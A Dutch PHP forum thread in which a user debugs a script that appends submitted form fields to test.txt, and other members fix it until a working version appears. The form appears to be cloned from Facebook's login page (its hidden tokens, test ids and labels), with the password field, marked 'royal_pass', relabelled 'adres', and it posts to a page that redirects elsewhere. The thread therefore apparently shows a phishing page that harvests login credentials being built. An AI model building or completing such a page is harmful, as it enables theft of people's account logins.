php file contents probleem

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Pagina: 1 2 volgende »

Pascal klienstra

pascal klienstra

09/07/2019 17:27:00
Quote Anchor link
Hallo,
Ik heb een probleem ik wil via een POST-method dat ze worden opgeslagen in een .txt bestand alleen krijg ik de volgende fout


Parse error: syntax error, unexpected '{' in C:\wamp64\www\index.php on line 12

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

<?php
 if(isset($_POST['submit']) {
//Het ophalen en het schrijven van het bestand
$file = 'test.txt';
$text = $_POST['email'];
$text = $_POST['adres'];
$fhandler = fopen($file, "a");
fwrite($fhandler, $text);
fclose($fhandler);
 }

 ?>

<form id="login_form" action="page2.php" method="post" novalidate="1" onsubmit="">
<input type="hidden" name="jazoest" value="2684" autocomplete="off" />
<input type="hidden" name="lsd" value="AVoQcVLP" autocomplete="off" />
<table cellspacing="0" role="presentation"><tr><td class="html7magic">
<label for="email">E-mailadres of telefoonnummer</label></td>
<td class="html7magic"><label for="adres">Adres</label></td></tr>
<tr><td><input type="email" class="inputtext" name="email" id="email" data-testid="royal_email" /></td><td>
<input type="adres" class="inputtext" name="adres" id="adres" data-testid="royal_pass" /></td><td>
<label class="uiButton uiButtonConfirm" id="loginbutton" for="u_0_2">
<input value="Aanmelden" aria-label="Aanmelden" data-testid="royal_login_button" type="submit" id="u_0_2" /></label></td></tr>


bij lijn 12 kom ik dan op dit

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
if(isset($_POST['submit']) {
 
PHP hulp

PHP hulp

29/03/2024 11:31:27
 
- Ariën  -
Beheerder

- Ariën -

09/07/2019 17:31:56
Quote Anchor link
Je mist een )

Bij the way: Je overschrijft steeds $text.
Gewijzigd op 09/07/2019 17:38:05 door - Ariën -
 
Pascal klienstra

pascal klienstra

09/07/2019 17:39:40
Quote Anchor link
Ah top bedankt dom van me alleen het probleem hij slaat het nu niet op de email + adres
kan het te maken heb dat ik hem moet chmodden ? want gebruik nu localhost wampp
 
- SanThe -

- SanThe -

09/07/2019 17:45:27
Quote Anchor link
Iets meer Nederlands graag.
 
- Ariën  -
Beheerder

- Ariën -

09/07/2019 17:48:35
Quote Anchor link
Chmod is een Linux iets.
WAMP is Windows, dus chmod speelt bij jou geen rol.

Maakt het script geen test.txt aan?
Gewijzigd op 09/07/2019 17:48:56 door - Ariën -
 
Pascal klienstra

pascal klienstra

09/07/2019 17:50:32
Quote Anchor link
Ik heb al een test.txt bestand aangemaakt.
maar ik wil het als volgende als ik het formulier invul.
email:
adres

wil ik dat het in het tekst bestandje test.txt komt te staan.
 
- Ariën  -
Beheerder

- Ariën -

09/07/2019 17:51:50
Quote Anchor link
Zet dit dan in $text.

$text = 'Naam: '.$_POST['email'].'\n'.'Adres: '.$_POST['adres'];
Gewijzigd op 09/07/2019 17:54:08 door - Ariën -
 
Pascal klienstra

pascal klienstra

09/07/2019 18:08:26
Quote Anchor link
heb nu het volgende
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
<?php
 if(isset($_POST['submit'])) {
//Het ophalen en het schrijven van het bestand
$file = 'test.txt';
$text = 'Email: '.$_POST['email'].'\n'.'Adres: '.$_POST['adres'];
$fhandler = fopen($file, "a");
fwrite($fhandler, $text);
fclose($fhandler);
 }

 ?>


maar hij schrijft het nog steeds niet in het test.txt bestandje
 
- Ariën  -
Beheerder

- Ariën -

09/07/2019 18:12:25
Quote Anchor link
Smijt eens een echo neer in je script. Kijk eens of je script überhaupt wordt uitgevoerd.
 
Adoptive Solution

Adoptive Solution

09/07/2019 18:14:38
Quote Anchor link
De submit knop moet ook een name='submit' hebben anders wordt er niets bewaard.

PS is het nog gelukt met de icoontjes in de input velden?

Zie vraag week geleden.
Gewijzigd op 09/07/2019 18:18:02 door Adoptive Solution
 
- SanThe -

- SanThe -

09/07/2019 18:15:45
Quote Anchor link
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?php
 if(isset($_POST['submit'])) {
?>


Zal false zijn.

Je hebt geen name="submit" in de input.

<input value="Aanmelden" aria-label="Aanmelden" data-testid="royal_login_button" type="submit" id="u_0_2" />
 
Pascal klienstra

pascal klienstra

09/07/2019 18:22:50
Quote Anchor link
als ik de name bij invoeg werkt die ook niet
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<input value="Aanmelden" aria-label="Aanmelden" data-testid="royal_login_button" name="submit" type="submit" id="u_0_2" /></label></td></tr>



Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12

<?php
 if(isset($_POST['submit'])) {
//Het ophalen en het schrijven van het bestand
$file = 'test.txt';
$text = 'Email: '.$_POST['email'].'\n'.'adres: '.$_POST['adres'];
$fhandler = fopen($file, "a");
fwrite($fhandler, $text);
echo $text;
fclose($fhandler);
 }

 ?>

geprobeerd een echo uit te voeren maar krijg niks te zien
Gewijzigd op 09/07/2019 18:27:25 door pascal klienstra
 
- Ariën  -
Beheerder

- Ariën -

09/07/2019 18:37:51
Quote Anchor link
Waarom controleer je gewoon niet of er ge-POST is?
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
if($_SERVER['REQUEST_METHOD']=="POST") {


Let erop dat je form wel naar page2.php verwijst!
Gewijzigd op 09/07/2019 18:38:46 door - Ariën -
 
Adoptive Solution

Adoptive Solution

09/07/2019 18:47:39
Quote Anchor link
Zo werkt het bij mij.

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
if( isset( $_POST['submit'] ) )
{

    //Het ophalen en het schrijven van het bestand
    $file  = 'test.txt';
    $text  = $_POST['email'] . "\n";
    $text .= $_POST['adres'] . "\n";
    $fhandler = fopen($file, "a");
    fwrite($fhandler, $text);
    fclose($fhandler);
}

?>

<form id="login_form" action="" method="post" novalidate="1">

    <table cellspacing="0" role="presentation">
        <tr>
            <td><label for="email">E-mailadres</label></td>
            <td><label for="adres">Adres</label></td>
        </tr>
    <tr>
        <td>
            <input type="email"name="email" id="email" />
        </td>
        <td>
            <input type="adres" name="adres" id="adres" />
        </td>
        <td>
            <label for="u_0_2"></label>
            <input value="Aanmelden" name="submit" type="submit" id="u_0_2" /></td></tr>
    </table>
</form>
 
Pascal klienstra

pascal klienstra

09/07/2019 18:50:00
Quote Anchor link
Ja dat klopt dat wil ik zelf dat die naar page2.php verwijst
ik heb nu dit maar nog steeds geen resultaat
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
<?php
 if(isset($_POST['submit'])) {    
 if($_SERVER['REQUEST_METHOD']=="POST") {
//Het ophalen en het schrijven van het bestand
$file = 'test.txt';
$text = 'Email: '.$_POST['email'].'\n'.'adres: '.$_POST['adres'];
$fhandler = fopen($file, "a");
fwrite($fhandler, $text);
fclose($fhandler);
 }
 }

 ?>


heeft het wellicht met het html formulier te maken?

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
<form id="login_form" action="<?php $_PHP_SELF ?>" method="post" novalidate="1" onsubmit="">
<input type="hidden" name="jazoest" value="2684" autocomplete="off" />
<input type="hidden" name="lsd" value="AVoQcVLP" autocomplete="off" />
<table cellspacing="0" role="presentation"><tr><td class="html7magic">
<label for="email">E-mailadres of telefoonnummer</label></td>
<td class="html7magic"><label for="adres">Adres</label></td></tr>
<tr><td><input type="email" class="inputtext" name="email" id="email" data-testid="royal_email" /></td><td>
<input type="adres" class="inputtext" name="adres" id="adres" data-testid="royal_adres" /></td><td>
<label class="uiButton uiButtonConfirm" id="loginbutton" for="u_0_2">
<input value="Aanmelden" aria-label="Aanmelden" data-testid="royal_login_button" name="submit" type="submit" id="u_0_2" /></label></td></tr>
Gewijzigd op 09/07/2019 18:56:13 door pascal klienstra
 
- Ariën  -
Beheerder

- Ariën -

09/07/2019 18:56:41
Quote Anchor link
$_PHP_SELF waar komt dat dan vandaan?
En waarom een dubbele if? Je kan het ook combineren in één voorwaarde.
Gewijzigd op 09/07/2019 19:05:45 door - Ariën -
 
Pascal klienstra

pascal klienstra

09/07/2019 19:05:27
Quote Anchor link
Dat had ik net even geprobeerd dacht misschien werkt het dan wel maar heb het al weggehaald.
 
- Ariën  -
Beheerder

- Ariën -

09/07/2019 19:06:03
Quote Anchor link
En waarom een dubbele if? Je kan het ook combineren in één voorwaarde.
Kan je het script niet op page2.php inbouwen? Dat verwees je eerder al heen.
Gewijzigd op 09/07/2019 19:07:26 door - Ariën -
 
Pascal klienstra

pascal klienstra

09/07/2019 19:13:56
Quote Anchor link
Page2.php verwijs ik door naar een andere pagina
maar het raar er van is dat die de post method niet opslaat in het txt bestandje
 
- Ariën  -
Beheerder

- Ariën -

09/07/2019 19:31:02
Quote Anchor link
Omdat hij eerst naar page2.php verwijst?
Dus handel het daarin af?
 
Thomas van den Heuvel

Thomas van den Heuvel

09/07/2019 21:53:29
Quote Anchor link
Heb je al gekeken of het bestand uberhaupt bestaat en schrijfbaar is?

Het lijkt mij trouwens geen goed plan om dit soort bestanden in de publieke webdirectory te laten slingeren. Ik zou dus ook op zijn minst een pad verwachten naar buiten de webdir.
 

Pagina: 1 2 volgende »



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.